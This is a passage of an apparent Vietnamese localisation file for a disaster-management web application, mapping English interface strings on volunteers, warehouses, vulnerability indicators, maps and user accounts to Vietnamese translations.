containing new-line separated strings:': 'Tải lên một tệp tin văn bản chứa các chuỗi được tách thành dòng mới:', 'Upload an Assessment Template import file': 'Tải lên một tệp tin được chiết xuất chứa Biểu mẫu Khảo sát đánh giá', 'Upload an image file (png or jpeg), max. 400x400 pixels!': 'Tải lên file hình ảnh (png hoặc jpeg) có độ phân giải tối đa là 400x400 điểm ảnh!', 'Upload demographic data': 'Tải lên dữ liệu nhân khẩu', 'Upload file': 'Tải file', 'Upload indicators': 'Tải lên các chỉ số', 'Upload successful': 'Tải lên thành công', 'Upload the (completely or partially) translated csv file': 'Tải lên (toàn bộ hoặc một phần) tệp tin csv đã được chuyển ngữ', 'Upload the Completed Assessment Form': 'Tải lên Mẫu đánh giá', 'Upload translated files': 'Tải file được dịch', 'Upload': 'Tải lên', 'Uploaded PDF file has more/less number of page(s) than required. Check if you have provided appropriate revision for your Form as well as check the Form contains appropriate number of pages.': 'File PDF được tải lên có số trang nhiều hơn/ít hơn yêu cầu. Hãy kiểm tra xem bạn đã cung cấp đúng phiên bản cho Mẫu của bạn chưa, cũng như kiểm tra Mẫu có chứa đúng số trang không.', 'Uploaded file is not a PDF file. Provide a Form in valid PDF Format.': 'File được tải không phải định dạng PDF. Cung cấp mẫu ở định dạng PDF', 'Uploading report details': 'Đang tải lên các chi tiết báo cáo', 'Urban Fire': 'Cháy trong thành phố', 'Urban Risk & Planning': 'Quy hoạch đô thị và Rủi ro đô thị', 'Urdu': 'Tiếng Urdu (một trong hai ngôn ngữ chính thức tại Pakistan)', 'Urgent': 'Khẩn cấp', 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Sử dụng (...)&(...) cho VÀ, (...)|(...) cho HOẶC, và ~(...) cho KHÔNG để tạo ra những câu hỏi phức tạp hơn.', 'Use Geocoder for address lookups?': 'Sử dụng Geocoder để tìm kiếm địa chỉ?', 'Use Translation Functionality': 'Sử dụng Chức năng Dịch', 'Use decimal': 'Sử dụng số thập phân', 'Use default': 'Sử dụng cài đặt mặc định', 'Use deg, min, sec': 'Sử dụng độ, phút, giây', 'Use these links to download data that is currently in the database.': 'Dùng liên kết này để tải dữ liệu hiện có trên cơ sở dữ liệu xuống', 'Use this space to add a description about the Bin Type.': 'Thêm thông tin mô tả loại Bin ở đây', 'Use this space to add a description about the warehouse/site.': 'Thêm mô tả nhà kho/site ở đây', 'Use this space to add additional comments and notes about the Site/Warehouse.': 'Viết bình luận và ghi chú về site/nhà kho ở đây', 'Use this to set the starting location for the Location Selector.': 'Sử dụng cái này để thiết lập địa điểm xuất phát cho Bộ chọn lọc Địa điểm.', 'Used in onHover Tooltip & Cluster Popups to differentiate between types.': 'Đã dùng trong onHover Tooltip & Cluster Popups để phân biệt các loại', 'Used to build onHover Tooltip & 1st field also used in Cluster Popups to differentiate between records.': 'Đã dùng để xây dựng onHover Tooltip & trường thứ nhất cũng đã sử dụng trong Cluster Popups phân biệt các hồ sơ.', 'Used to check that latitude of entered locations is reasonable. May be used to filter lists of resources that have locations.': 'Được sử dụng để kiểm tra vĩ độ của những địa điểm được nhập có chính xác không. Có thể được sử dụng để lọc danh sách các nguồn lực có địa điểm.', 'Used to check that longitude of entered locations is reasonable. May be used to filter lists of resources that have locations.': 'Được sử dụng để kiểm tra kinh độ của những địa điểm được nhập có chính xác không. 
Có thể được sử dụng để lọc danh sách các nguồn lực có địa điểm.', 'User Account has been Approved': 'Tài khoản của người sử dụng đã được duyệt', 'User Account has been Disabled': 'Tài khoản của người sử dụng đã bị ngưng hoạt động', 'User Account': 'Tài khoản của người sử dụng', 'User Details': 'Thông tin về người sử dụng', 'User Guidelines Synchronization': 'Đồng bộ hóa Hướng dẫn cho Người sử dụng', 'User Management': 'Quản lý người dùng', 'User Profile': 'Hồ sơ người sử dụng', 'User Requests': 'Yêu cầu của người dùng', 'User Roles': 'Vai trò của người sử dụng', 'User Updated': 'Đã cập nhật người dùng', 'User added to Role': 'Người sử dụng được thêm vào chức năng', 'User added': 'Người sử dụng được thêm vào', 'User deleted': 'Người sử dụng đã xóa', 'User has been (re)linked to Person and Human Resource record': 'Người sử dụng đã được liên kết thành công', 'User updated': 'Người sử dụng được cập nhật', 'User with Role': 'Người sử dụng có chức năng này', 'User': 'Người sử dụng', 'Username to use for authentication at the remote site.': 'Tên người sử dụng dùng để xác nhận tại khu vực ở xa.', 'Username': 'Tên người sử dụng', 'Users in my Organizations': 'Những người dùng trong tổ chức của tôi', 'Users removed': 'Xóa người dùng', 'Users with this Role': 'Những người sử dụng với chức năng này', 'Users': 'Danh sách người dùng', 'Uses the REST Query Format defined in': 'Sử dụng Định dạng câu hỏi REST đã được xác định trong', 'Ushahidi Import': 'Nhập Ushahidi', 'Utilization Details': 'Chi tiết về Việc sử dụng', 'Utilization Report': 'Báo cáo quá trình sử dụng', 'VCA (Vulnerability and Capacity Assessment': 'VCA (Đánh giá Tình trạng dễ bị tổn thương và Khả năng)', 'VCA REPORTS': 'BÁO CÁO VCA', 'VCA Report': 'Báo cáo VCA', 'Valid From': 'Có hiệu lực từ', 'Valid Until': 'Có hiệu lực đến', 'Valid': 'Hiệu lực', 'Validation error': 'Lỗi xác thực', 'Value per Pack': 'Giá trị mỗi gói', 'Value': 'Giá trị', 'Vector Control': 'Kiểm soát Vec-tơ', 'Vehicle Assignment updated': 'Việc điều động xe được cập nhật', 'Vehicle Assignments': 'Các việc điều động xe', 'Vehicle Crime': 'Tội phạm liên quan đến xe', 'Vehicle Details': 'Thông tin về xe', 'Vehicle Plate Number': 'Biển số xe', 'Vehicle Types': 'Loại phương tiện di chuyển', 'Vehicle assigned': 'Xe được điều động', 'Vehicle unassigned': 'Xe chưa được điều động', 'Vehicle': 'Xe', 'Vehicles': 'Phương tiện di chuyển', 'Venue': 'Địa điểm tổ chức', 'Verified': 'Đã được thẩm định', 'Verified?': 'Đã được thẩm định?', 'Verify Password': 'Kiểm tra mật khẩu', 'Verify password': 'Kiểm tra mật khẩu', 'Version': 'Phiên bản', 'Very Good': 'Rất tốt', 'Very Strong': 'Rất mạnh', 'Vietnamese': 'Tiếng Việt', 'View Alerts received using either Email or SMS': 'Xem các Cảnh báo nhận được sử dụng thư điện tử hoặc tin nhắn', 'View All': 'Xem tất cả', 'View Email InBox': 'Xem hộp thư điện tử đến', 'View Email Settings': 'Xem cài đặt thư điện tử', 'View Error Tickets': 'Xem các vé lỗi', 'View Fullscreen Map': 'Xem bản đồ toàn màn hình', 'View Items': 'Xem các mặt hàng', 'View Location Details': 'Xem chi tiết vị trí', 'View Outbox': 'Xem hộp thư điện tử đi', 'View Reports': 'Xem báo cáo', 'View Requests for Aid': 'Xem Yêu cầu viện trợ', 'View Settings': 'Xem cài đặt', 'View Test Result Reports': 'Xem báo cáo kết quả kiểm tra', 'View Translation Percentage': 'Xem tỷ lệ phần trăm chuyển đổi', 'View Twilio SMS': 'Xem tin nhắn văn bản Twilio', 'View Twilio Settings': 'Xem các Cài đặt Twilio', 'View all log entries': 'Xem toàn bộ nhật ký ghi chép', 'View as Pages': 'Xem từng trang', 'View full 
size': 'Xem kích thước đầy đủ', 'View log entries per repository': 'Xem ghi chép nhật ký theo kho hàng', 'View on Map': 'Xem trên bản đồ', 'View or update the status of a hospital.': 'Xem hoặc cập nhật trạng thái của một bệnh viện', 'View the hospitals on a map.': 'Hiển thị bệnh viện trên bản đồ', 'View the module-wise percentage of translated strings': 'Xem tỷ lệ phần trăm chuỗi đã dịch theo từng mô-đun', 'View': 'Xem', 'View/Edit the Database directly': 'Trực tiếp Xem/Sửa Cơ sở dữ liệu', 'Village / Suburb': 'Thôn / Xóm', 'Violence Prevention': 'Phòng ngừa bạo lực', 'Vocational School/ College': 'Trung cấp/ Cao đẳng', 'Volcanic Ash Cloud': 'Mây bụi núi lửa', 'Volcanic Event': 'Sự kiện phun trào núi lửa', 'Volcano': 'Núi lửa', 'Volume (m3)': 'Thể tích (m3)', 'Volunteer Cluster Position added': 'Vị trí Nhóm Tình nguyện viên được thêm vào', 'Volunteer Cluster Position deleted': 'Vị trí Nhóm Tình nguyện viên đã xóa', 'Volunteer Cluster Position updated': 'Vị trí Nhóm Tình nguyện viên được cập nhật', 'Volunteer Cluster Position': 'Vị trí Nhóm Tình nguyện viên', 'Volunteer Cluster Type added': 'Mô hình Nhóm Tình nguyện viên được thêm vào', 'Volunteer Cluster Type deleted': 'Mô hình Nhóm Tình nguyện viên đã xóa', 'Volunteer Cluster Type updated': 'Mô hình Nhóm Tình nguyện viên được cập nhật', 'Volunteer Cluster Type': 'Mô hình Nhóm Tình nguyện viên', 'Volunteer Cluster added': 'Nhóm Tình nguyện viên được thêm vào', 'Volunteer Cluster deleted': 'Nhóm Tình nguyện viên đã xóa', 'Volunteer Cluster updated': 'Nhóm Tình nguyện viên được cập nhật', 'Volunteer Cluster': 'Nhóm Tình nguyện viên', 'Volunteer Data': 'Dữ liệu tình nguyện viên', 'Volunteer Details updated': 'Thông tin về Tình nguyện viên được cập nhật', 'Volunteer Details': 'Thông tin về Tình nguyện viên', 'Volunteer Management': 'Quản lý tình nguyện viên', 'Volunteer Project': 'Dự án tình nguyện', 'Volunteer Record': 'Hồ sơ TNV', 'Volunteer Registration': 'Đăng ký tình nguyện viên', 'Volunteer Registrations': 'Đăng ký tình nguyện viên', 'Volunteer Report': 'Tình nguyện viên', 'Volunteer Request': 'Đề nghị Tình nguyện viên', 'Volunteer Role (Count)': 'Chức năng nhiệm vụ TNV (Số lượng)', 'Volunteer Role Catalog': 'Danh mục về Vai trò của Tình nguyện viên', 'Volunteer Role Catalogue': 'Danh mục vai trò TNV', 'Volunteer Role Details': 'Chi tiết về Vai trò của Tình nguyện viên', 'Volunteer Role added': 'Vai trò của Tình nguyện viên được thêm vào', 'Volunteer Role deleted': 'Vai trò của Tình nguyện viên đã xóa', 'Volunteer Role updated': 'Vai trò của Tình nguyện viên được cập nhật', 'Volunteer Role': 'Chức năng nhiệm vụ TNV', 'Volunteer Roles': 'Chức năng nhiệm vụ TNV', 'Volunteer Service Record': 'Bản lưu Dịch vụ Tình nguyện viên', 'Volunteer added': 'Tình nguyện viên được thêm vào', 'Volunteer and Staff Management': 'Quản lý TNV và Cán bộ', 'Volunteer deleted': 'Tình nguyện viên đã xóa', 'Volunteer registration added': 'Đã thêm đăng ký tình nguyện viên', 'Volunteer registration deleted': 'Đã xóa đăng ký tình nguyện viên', 'Volunteer registration updated': 'Đã cập nhật đăng ký tình nguyện viên', 'Volunteer': 'Tình nguyện viên', 'Volunteers': 'Tình nguyện viên', 'Votes': 'Bình chọn', 'Vulnerability Aggregated Indicator Details': 'Chi tiết về chỉ số tổng hợp về Tình trạng dễ bị tổn thương', 'Vulnerability Aggregated Indicator added': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability Aggregated Indicator deleted': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability Aggregated Indicator updated': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn 
thương được cập nhật', 'Vulnerability Aggregated Indicator': 'Chỉ số tổng hợp về Tình trạng dễ bị tổn thương', 'Vulnerability Aggregated Indicators': 'Các chỉ số tổng hợp về Tình trạng dễ bị tổn thương', 'Vulnerability Data Details': 'Dữ liệu chi tiết về Tình trạng dễ bị tổn thương', 'Vulnerability Data added': 'Dữ liệu về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability Data deleted': 'Dữ liệu về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability Data updated': 'Dữ liệu về Tình trạng dễ bị tổn thương được cập nhật', 'Vulnerability Data': 'Dữ liệu về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator Details': 'Chỉ số chi tiết về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator Source Details': 'Chi tiết Nguồn Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator Sources': 'Các Nguồn Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Indicator added': 'Chỉ số về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability Indicator deleted': 'Chỉ số về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability Indicator updated': 'Chỉ số về Tình trạng dễ bị tổn thương được cập nhật', 'Vulnerability Indicator': 'Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Indicators': 'Các Chỉ số về Tình trạng dễ bị tổn thương', 'Vulnerability Mapping': 'Vẽ bản đồ về Tình trạng dễ bị tổn thương', 'Vulnerability indicator sources added': 'Các nguồn chỉ số về Tình trạng dễ bị tổn thương được thêm vào', 'Vulnerability indicator sources deleted': 'Các nguồn chỉ số về Tình trạng dễ bị tổn thương đã xóa', 'Vulnerability indicator sources updated': 'Các nguồn chỉ số về Tình trạng dễ bị tổn thương được cập nhật', #'Vulnerability': 'Tình trạng dễ bị tổn thương', 'Vulnerability': 'TTDBTT', 'Vulnerable Populations': 'Đối tượng dễ bị tổn thương', 'WARNING': 'CẢNH BÁO', 'WATSAN': 'NSVS', 'WAYBILL': 'VẬN ĐƠN', 'WFS Layer': 'Lớp WFS', 'WGS84 (EPSG 4236) is required for many WMS servers.': 'WGS84 (EPSG 4236) cần có cho nhiều máy chủ WMS.', 'WMS Layer': 'Lớp WMS', 'Warehouse Details': 'Thông tin về Nhà kho', 'Warehouse Management': 'Quản lý kho hàng', 'Warehouse Stock Details': 'Thông tin về Hàng hóa trong kho', 'Warehouse Stock Report': 'Báo cáo Hàng hóa trong Nhà kho', 'Warehouse Stock updated': 'Hàng hóa trong kho được cập nhật', 'Warehouse Stock': 'Hàng trong kho', 'Warehouse added': 'Nhà kho được thêm vào', 'Warehouse deleted': 'Nhà kho đã xóa', 'Warehouse updated': 'Nhà kho được cập nhật', 'Warehouse': 'Nhà kho', 'Warehouse/Facility/Office (Recipient)': 'Nhà kho/Bộ phận/Văn phòng (Bên nhận)', 'Warehouse/Facility/Office': 'Nhà kho/Bộ phận/Văn phòng', 'Warehouses': 'Nhà kho', 'Water Sources': 'Các nguồn nước', 'Water Supply': 'Cung cấp nước sạch', 'Water and Sanitation': 'Nước sạch và Vệ sinh', 'Water gallon': 'Ga-lông nước', 'Water': 'Nước', 'Waterspout': 'Máng xối nước', 'Way Bill(s)': 'Hóa đơn thu phí đường bộ', 'Waybill Number': 'Số Vận đơn', 'We have tried': 'Chúng tôi đã cố gắng', 'Weak': 'Yếu', 'Web API settings updated': 'Cài đặt API Trang thông tin được cập nhật', 'Web API': 'API Trang thông tin', 'Web Form': 'Kiểu Trang thông tin', 'Web Map Service Browser Name': 'Tên Trình duyệt Dịch vụ Bản đồ Trang thông tin', 'Web Map Service Browser URL': 'URL Trình duyệt Dịch vụ Bản đồ Trang thông tin', 'Web2py executable zip file found - Upload to replace the existing file': 'Tệp tin nén có thể thực hiện chức năng gián điệp - Đăng tải để thay thế tệp tin đang tồn tại', 'Web2py executable zip file needs to be uploaded to use this function.': 'Tệp tin nén có thể thực hiện chức năng 
gián điệp cần được đăng tải để sử dụng chức năng này.', 'Website': 'Trang thông tin', 'Week': 'Tuần', 'Weekly': 'Hàng tuần', 'Weight (kg)': 'Trọng lượng (kg)', 'Weight': 'Trọng lượng', 'Welcome to %(system_name)s': 'Chào mừng anh/chị truy cập %(system_name)s', 'Welcome to the': 'Chào mừng bạn tới', 'Well-Known Text': 'Từ khóa thường được dùng', 'What are you submitting?': 'Bạn đang gửi cái gì?', 'What order to be contacted in.': 'Đơn hàng nào sẽ được liên hệ trao đổi.', 'What the Items will be used for': 'Các mặt hàng sẽ được sử dụng để làm gì', 'When this search was last checked for changes.': 'Tìm kiếm này được kiểm tra lần cuối là khi nào để tìm ra những thay đổi.', 'Whether the Latitude & Longitude are inherited from a higher level in the location hierarchy rather than being a separately-entered figure.': 'Vĩ độ & Kinh độ có được chiết xuất từ một địa điểm có phân cấp hành chính cao hơn hay là một con số được nhập riêng lẻ.', 'Whether the resource should be tracked using S3Track rather than just using the Base Location': 'Nguồn lực nên được theo dõi sử dụng Dấu vết S3 hay chỉ sử dụng Địa điểm cơ bản', 'Which methods to apply when importing data to the local repository': 'Áp dụng phương pháp nào khi nhập dữ liệu vào kho dữ liệu nội bộ', 'Whiskers': 'Râu', 'Who is doing What Where': 'Ai đang làm Gì Ở đâu', 'Who usually collects water for the family?': 'Ai là người thường đi lấy nước cho cả gia đình', 'Widowed': 'Góa', 'Width (m)': 'Rộng (m)', 'Width': 'Độ rộng', 'Wild Fire': 'Cháy Lớn', 'Will be filled automatically when the Item has been Repacked': 'Sẽ được điền tự động khi Hàng hóa được Đóng gói lại', 'Will be filled automatically when the Shipment has been Received': 'Sẽ được điền tự động khi Lô hàng được Nhận', 'Wind Chill': 'Rét cắt da cắt thịt', 'Winter Storm': 'Bão Mùa đông', 'Women of Child Bearing Age': 'Phụ nữ trong độ tuổi sinh sản', 'Women who are Pregnant or in Labour': 'Phụ nữ trong thời kỳ thai sản', 'Work phone': 'Điện thoại công việc', 'Work': 'Công việc', 'Workflow not specified!': 'Chuỗi công việc chưa được xác định!', 'Workflow': 'Chuỗi công việc', 'Working hours end': 'Hết giờ làm việc', 'Working hours start': 'Bắt đầu giờ làm việc', 'X-Ray': 'Tia X', 'XML parse error': 'Lỗi phân tích cú pháp trong XML', 'XSLT stylesheet not found': 'Không tìm thấy kiểu bảng tính XSLT', 'XSLT transformation error': 'Lỗi chuyển đổi định dạng XSLT', 'XYZ Layer': 'Lớp XYZ', 'YES': 'CÓ', 'Year of Manufacture': 'Năm sản xuất', 'Year that the organization was founded': 'Năm thành lập tổ chức', 'Year': 'Năm', 'Yes': 'Có', 'Yes, No': 'Có, Không', 'You are about to submit indicator ratings for': 'Bạn chuẩn bị gửi đánh giá chỉ số cho', 'You are attempting to delete your own account - are you sure you want to proceed?': 'Bạn đang cố gắng xóa tài khoản của bạn - bạn có chắc chắn muốn tiếp tục không?', 'You are currently reported missing!': 'Hiện tại bạn được báo cáo là đã mất tích!', 'You are not permitted to approve documents': 'Bạn không được phép phê duyệt tài liệu', 'You are not permitted to upload files': 'Bạn không được phép đăng tải tệp tin', 'You are viewing': 'Bạn đang xem', 'You can click on the map below to select the Lat/Lon fields': 'Bạn có thể nhấn vào bản đồ phía dưới để chọn các trường Vĩ độ/Kinh độ', 'You can only make %d kit(s) with the available stock': 'Bạn chỉ có thể điền %d bộ(s) với các số lượng hàng có sẵn', 'You can select the Draw tool': 'Bạn có thể lựa chọn công cụ Vẽ', 'You can set the modem settings for SMS here.': 'Bạn có thể cài đặt modem cho tin nhắn ở đây', 'You 
can use the Conversion Tool to convert from either GPS coordinates or Degrees/Minutes/Seconds.': 'Bạn có thể sử dụng Công cụ Đổi để chuyển đổi từ tọa độ GPS (Hệ thống định vị toàn cầu) hoặc Độ/ Phút/ Giây.', 'You do not have permission for any facility to add an order.': 'Bạn không có quyền đối với bất kỳ tính năng nào để thêm đơn đặt hàng.', 'You do not have permission for any facility to make a commitment.': 'Bạn không có quyền đối với bất kỳ tính năng nào để đưa ra cam kết.', 'You do not have permission for any facility to make a request.': 'Bạn không có quyền đối với bất kỳ tính năng nào để đưa ra yêu cầu.', 'You do not have permission for any facility to perform this action.': 'Bạn không có quyền đối với bất kỳ tính năng nào để thực hiện hành động này.', 'You do not have permission for any facility to receive a shipment.': 'Bạn không có quyền đối với bất kỳ tính năng nào để nhận chuyến hàng.', 'You do not have permission for any facility to send a shipment.': 'Bạn không có quyền đối với bất kỳ tính năng nào để gửi chuyến hàng.', 'You do not have permission for any organization to perform this action.': 'Bạn không có quyền truy cập bất cứ tổ chức nào để thực hiện hành động này', 'You do not have permission for any site to add an inventory item.': 'Bạn không được phép thêm mặt hàng lưu kho tại bất kỳ địa điểm nào.', 'You do not have permission to adjust the stock level in this warehouse.': 'Bạn không được phép điều chỉnh cấp độ lưu kho trong nhà kho này.', 'You do not have permission to cancel this received shipment.': 'Bạn không được phép hủy lô hàng đã nhận này.', 'You do not have permission to cancel this sent shipment.': 'Bạn không được phép hủy lô hàng đã gửi này.', 'You do not have permission to make this commitment.': 'Bạn không được phép thực hiện cam kết này.', 'You do not have permission to receive this shipment.': 'Bạn không được phép nhận lô hàng này.', 'You do not have permission to return this sent shipment.': 'Bạn không được phép trả lại lô hàng đã gửi này.', 'You do not have permission to send messages': 'Bạn không được phép gửi tin nhắn', 'You do not have permission to send this shipment.': 'Bạn không được phép gửi lô hàng này.', 'You have unsaved changes. You need to press the Save button to save them': 'Bạn chưa lưu lại những thay đổi. Bạn cần nhấn nút Lưu để lưu lại những thay đổi này', 'You must enter a minimum of %d characters': 'Bạn phải điền ít nhất %d ký tự', 'You must provide a series id to proceed.': 'Bạn phải nhập số id của serie để thao tác tiếp', 'You need to check all item quantities and allocate to bins before you can receive the shipment': 'Bạn cần kiểm tra số lượng của tất cả các mặt hàng và chia thành các thùng trước khi nhận lô hàng', 'You need to check all item quantities before you can complete the return process': 'Bạn cần kiểm tra số lượng của tất cả các mặt hàng trước khi hoàn tất quá trình trả lại hàng', 'You need to create a template before you can create a series': 'Bạn cần tạo ra một biểu mẫu trước khi tạo ra một loạt các biểu mẫu', 'You need to use the spreadsheet which you can download from this page': 'Bạn cần sử dụng bảng tính tải từ trang này', 'You should edit Twitter settings in models/000_config.py': 'Bạn nên chỉnh sửa cài đặt Twitter trong các kiểu models/000-config.py', 'Your name for this search. Notifications will use this name.': 'Tên của bạn cho tìm kiếm này. 
Các thông báo sẽ sử dụng tên này.', 'Your post was added successfully.': 'Bạn đã gửi thông tin thành công', 'Youth Development': 'Phát triển thanh thiếu niên', 'Youth and Volunteer Development': 'Phát triển TNV và Thanh thiếu niên', 'Zone Types': 'Các loại vùng châu lục', 'Zones': 'Vùng châu lục', 'Zoom In: click in the map or use the left mouse button and drag to create a rectangle': 'Phóng to: nhấn vào bản đồ hoặc sử dụng nút chuột trái và kéo để tạo ra một hình chữ nhật', 'Zoom Levels': 'Các cấp độ phóng', 'Zoom Out: click in the map or use the left mouse button and drag to create a rectangle': 'Thu nhỏ: nhấn vào bản đồ hoặc sử dụng nút chuột trái và kéo để tạo ra một hình chữ nhật', 'Zoom in closer to Edit OpenStreetMap layer': 'Phóng gần hơn tới lớp Sửa Bản đồ Đường đi Chưa xác định', 'Zoom to Current Location': 'Phóng đến Địa điểm Hiện tại', 'Zoom to maximum map extent': 'Phóng to để mở rộng tối đa bản đồ', 'Zoom': 'Phóng', 'access granted': 'truy cập được chấp thuận', 'activate to sort column ascending': 'Sắp xếp theo thứ tự tăng dần', 'activate to sort column descending': 'Sắp xếp theo thứ tự giảm dần', 'active': 'đang hoạt động', 'adaptation to climate change, sustainable development': 'thích ứng với biến đổi khí hậu, phát triển bền vững', 'always update': 'luôn luôn cập nhật', 'an individual/team to do in 1-2 days': 'một cá nhân/nhóm thực hiện trong 1-2 ngày', 'and': 'và', 'anonymous user': 'Người dùng nặc danh', 'assigned': 'đã phân công', 'at-risk populations, including: children, orphans, disabled, elderly, homeless, hospitalized people, illegal immigrants, illiterate, medically or chemically dependent, impoverished p': 'đối tượng chịu rủi ro gồm có: trẻ em, trẻ mồ côi, người khuyết tật, người già, người vô gia cư, người bệnh, dân di cư bất hợp pháp, người không biết chữ, người phải điều trị hóa chất hoặc điều trị y tế, người nghèo ', 'average': 'Trung bình', 'black': 'đen', 'blond': 'Tóc vàng', 'blue': 'Xanh da trời', 'brown': 'Nâu', 'bubonic plague, cholera, dengue, non-pandemic diseases, typhoid': 'bệnh dịch hạch, dịch tả, bệnh đănggơ, bệnh không phát dịch, bệnh thương hàn', 'building back better, long-term recovery and reconstruction, rehabilitation, shelter': 'hồi phục tốt hơn, tái xây dựng và phục hồi lâu dài, nhà tạm', 'building codes, building standards, building materials, construction, retrofitting': 'luật xây dựng, tiêu chuẩn xây dựng, vật liệu xây dựng, trang bị thêm ', 'by %(person)s': 'bởi %(person)s', 'by': 'bởi', 'can be used to extract data from spreadsheets and put them into database tables.': 'có thể dùng để trích xuất dữ liệu từ bẳng tính đưa vào cơ sở dữ liệu', 'cannot be deleted.': 'không thể xóa', 'capacity of health practitioners, mental health': 'năng lực của cán bộ CSSK, sức khỏe tâm thần', 'check all': 'kiểm tra tất cả', 'civic action, collective community action, community-based organization (CBO) action, grassroots action, integrative DRR, non-governmental organization (NGO) action': 'hành động của công dân, của cộng đồng, của các tổ chức dựa vào cộng đồng, GNRRTH mang tính tích hợp, các hành động của các tổ chức phi chính phủ.', 'civil protection, contingency and emergency planning, early recovery, preparedness': 'bảo vệ nhân dân, lập kế hoạch dự phòng và ứng phó với tình huống khẩn cấp, phục hồi nhanh, phòng ngừa', 'clear': 'xóa', 'click here': 'Ấn vào đây', 'coastal flood, wave surge, wind setup': 'lũ ven biển, sóng dâng cao, tạo gió', 'consider': 'cân nhắc', 'contains': 'Gồm có', 'coping capacity, loss absorption, loss acceptance, psychosocial 
support, social vulnerability, trauma prevention': 'khả năng ứng phó, khả năng chịu tổn thất, hỗ trợ tâm lý, tổn thương xã hội, ngăn ngừa các chấn thương tâm lý', 'corporate social responsibility, private sector engagement in DRR': 'trách nhiệm với xã hội của các công ty, tập đoàn, sự tham gia của khu vực tư nhân vào công tác GNRRTH', 'cost benefit analysis, disaster risk financing, financial effects of disasters, poverty and disaster risk, risk sharing, socio-economic impacts of disasters': 'phân tích lợi ích kinh tế, hỗ trợ tài chính cho hoạt động ứng phó với rủi ro thảm họa, ảnh hưởng tài chính của thảm họa, nghèo đói và rủi ro thảm họa, sự tác động đến kinh tế xã hội của thảm họa', 'crater, lava, magma, molten materials, pyroclastic flows, volcanic rock, volcanic ash': 'dung nham, vật liệu nóng chảy, nham tầng phun trào, nham thạch, bụi núi lửa', 'created': 'Đã tạo', 'curly': 'Xoắn', 'current': 'Đang hoạt động', 'daily': 'hàng ngày', 'dark': 'tối', 'database %s select': '%s cơ sở dự liệu lựa chọn', 'database': 'Cơ sở Dữ liệu', 'days': 'các ngày', 'debris flow, mud flow, mud slide, rock fall, slide, lahar, rock slide and topple': 'sạt lở đất, đá, sạt bùn', 'deceased': 'Đã chết', 'deficiency of precipitation, desertification, pronounced absence of rainfall': 'thiếu nước, sa mạc hóa, không có mưa kéo dài', 'delete all checked': 'Xóa tất cả các chọn', 'deleted': 'đã xóa', 'disaster databases, disaster information, disaster risk information portals, ICT': 'cơ sở dữ liệu về thảm họa, thông tin thảm họa, cổng thông tin về rủi ro thảm họa, ICT', 'disaster insurance, contingency funding, micro-insurance, post-disaster loans, risk financing, risk insurance, risk sharing, pooling': 'bảo hiểm thảm họa, quỹ dự phòng, bảo hiểm vi mô, khoản vay sau thảm họa, hỗ trợ tài chính nhằm ứng phó với rủi ro, chia sẻ, hợp nhất nhằm ứng phó với rủi ro', 'disaster reporting, disaster information dissemination': 'báo cáo thảm họa, tuyên truyền thông tin về thảm họa', 'disaster risk reduction policy and legislation, National Platform for disaster risk reduction, Regional Platforms for disaster risk reduction': 'việc banh hành và hoạch định chính sách về GNRRTH, Diễn đàn quốc gia về GNRRTH, Diễn đàn khu vực về GNRRTH', 'diseased': 'Bị dịch bệnh', 'displaced': 'Sơ tán', 'divorced': 'ly hôn', 'does not contain': 'không chứa', 'drinking water, freshwater, irrigation, potable water, water and sanitation, water resource management': 'nước uống, nước ngọt, hệ thống tưới tiêu, nước sạch và vệ sinh, quản lý nguồn nước', 'e.g. 
Census 2010': 'ví dụ Điều tra 2010', 'editor': 'người biên tập', 'expired': 'đã hết hạn', 'export as csv file': 'Xuất dưới dạng file csv', 'extreme weather, extreme temperature, cold temperatures': 'thời tiết cực đoan, nhiệt độ khắc nghiệt, nhiệt độ lạnh', 'extreme weather, extreme temperature, high temperatures': 'thời tiết cực đoan, nhiệt độ khắc nghiệt, nhiệt độ cao', 'fair': 'công bằng', 'fat': 'béo', 'feedback': 'phản hồi', 'female': 'nữ', 'fill in order: day(2) month(2) year(4)': 'điền theo thứ tự: ngày(2) tháng(2) năm(4)', 'fill in order: hour(2) min(2) day(2) month(2) year(4)': 'điền theo thứ tự: giờ(2) phút(2) ngày(2) tháng(2) năm(4)', 'forehead': 'Phía trước', 'form data': 'Tạo dữ liệu', 'found': 'Tìm thấy', 'full': 'đầy đủ', 'gendered vulnerability, gender-sensitive disaster risk management': 'tình trạng dễ bị tổn thương có yếu tố về giới, quản lý rủi ro thảm họa có tính nhạy cảm về giới', 'geographic information systems, hazard exposure mapping, vulnerability mapping, risk mapping': 'hệ thống thông tin địa lý, bản đồ hiểm họa, bản đồ tình trạng dễ bị tổn thương, bản đồ rủi ro', 'getting': 'đang nhận được', 'green': 'xanh lá cây', 'grey': 'xám', 'here': 'ở đây', 'hourly': 'hàng giờ', 'hours': 'thời gian hoạt động', 'hurricane, tropical storm, tropical depression, typhoon': 'bão, bão nhiệt đới, áp thấp nhiệt đới', 'ignore': 'bỏ qua', 'in GPS format': 'Ở định dạng GPS', 'in Stock': 'Tồn kho', 'in this': 'trong đó', 'in': 'trong', 'injured': 'Bị thương', 'input': 'nhập liệu', 'insert new %s': 'Thêm mới %s', 'insert new': 'Thêm mới', 'insufficient number of pages provided': 'không đủ số lượng trang được cung cấp', 'inundation; includes: flash floods': 'ngập úng, lũ quét', 'invalid request': 'Yêu cầu không hợp lệ', 'is a central online repository where information on all the disaster victims and families, especially identified casualties, evacuees and displaced people can be stored. Information like name, age, contact number, identity card number, displaced location, and other details are captured. Picture and finger print details of the people can be uploaded to the system. 
